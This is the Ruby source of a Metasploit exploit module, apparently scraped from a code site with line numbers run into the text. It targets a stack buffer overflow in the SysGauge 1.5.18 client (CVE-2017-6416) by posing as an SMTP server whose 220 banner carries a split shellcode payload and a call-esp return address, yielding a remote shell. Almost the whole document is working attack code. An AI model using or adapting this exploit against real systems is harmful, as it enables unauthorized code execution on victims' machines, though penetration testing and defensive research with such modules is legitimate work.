Path: blob/master/modules/exploits/windows/smtp/sysgauge_client_bof.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6include Msf::Exploit::Remote::TcpServer78Rank = NormalRanking910def initialize()11super(12'Name' => 'SysGauge SMTP Validation Buffer Overflow',13'Description' => %q{14This module will setup an SMTP server expecting a connection from SysGauge 1.5.1815via its SMTP server validation. The module sends a malicious response along in the16220 service ready response and exploits the client, resulting in an unprivileged shell.17},18'Author' => [19'Chris Higgins', # msf Module -- @ch1gg1ns20'Peter Baris' # Initial discovery and PoC21],22'License' => MSF_LICENSE,23'References' => [24[ 'CVE', '2017-6416' ],25[ 'EDB', '41479' ],26],27'DefaultOptions' => {28'EXITFUNC' => 'thread'29},30'Payload' => {31'Space' => 306,32'BadChars' => "\x00\x0a\x0d\x20"33},34'Platform' => 'win',35'Targets' => [36[37'Windows Universal',38{39'Offset' => 176,40'Ret' => 0x6527635E # call esp # QtGui4.dll41}42]43],44'Privileged' => false,45'DisclosureDate' => 'Feb 28 2017',46'DefaultTarget' => 047)48register_options(49[50OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),51]52)53end5455def on_client_connect(c)56# Note here that the payload must be split into two parts.57# The payload gets jumbled in the stack so we need to split58# and align to get it to execute correctly.59sploit = "220 "60sploit << rand_text(target['Offset'])61# Can only use the last part starting from 232 bytes in62sploit << payload.encoded[232..-1]63sploit << rand_text(2)64sploit << [target.ret].pack('V')65sploit << rand_text(12)66sploit << make_nops(8)67# And the first part up to 232 bytes68sploit << payload.encoded[0..231]69sploit << "ESMTP Sendmail \r\n"7071print_status("Client connected: " + c.peerhost)72print_status("Sending payload...")7374c.put(sploit)75end76end777879